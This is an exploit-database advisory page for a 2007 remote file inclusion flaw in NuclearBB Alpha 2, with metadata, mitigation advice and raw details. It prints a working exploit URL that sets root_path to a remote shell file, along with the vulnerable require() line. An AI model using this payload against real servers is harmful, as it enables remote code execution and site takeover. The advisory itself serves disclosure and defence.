header-logo
Suggest Exploit
vendor:
NuclearBB
by:
Infection
5.5
CVSS
MEDIUM
Remote File Inclusion
CWE
Product Name: NuclearBB
Affected Version From: NuclearBB Alpha 2
Affected Version To: NuclearBB Alpha 2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Remote File Inclusion in NuclearBB Alpha 2

This vulnerability allows an attacker to include a remote file in the vulnerable file /NuclearBB/tasks/send_queued_emails.php. The exploit URL is http://localhost/NuclearBB/tasks/send_queued_emails.php?root_path=http://localhost/shell.txt?. The vulnerability occurs due to the insecure handling of the root_path variable in the vulnerable file. By manipulating the root_path variable, an attacker can include arbitrary remote files, potentially leading to remote code execution or other malicious activities. The vulnerability was discovered by the author Infection from the Rootshell Security Team in 2007.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in file inclusion functions. Additionally, disabling register_globals and keeping software up to date can also help prevent such vulnerabilities.
Source

Exploit-DB raw data:

Vuln Product: NuclearBB Alpha 2
Vendor: http://www.nuclearbb.com/
Vulnerability Type: Remote File Inclusion
Autor: Infection
Team: Rootshell Security Team
Vulnerable file: /NuclearBB/tasks/send_queued_emails.php
Exploit URL: http://localhost/NuclearBB/tasks/send_queued_emails.php?root_path=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: root_path
Line number: 14
Lines:
----------------------------------------------
require("$root_path/inc/functions_email.php");
$mail = new email;
----------------------------------------------

# milw0rm.com [2007-09-11]

Navigation

Suggest Exploit

Services By CQR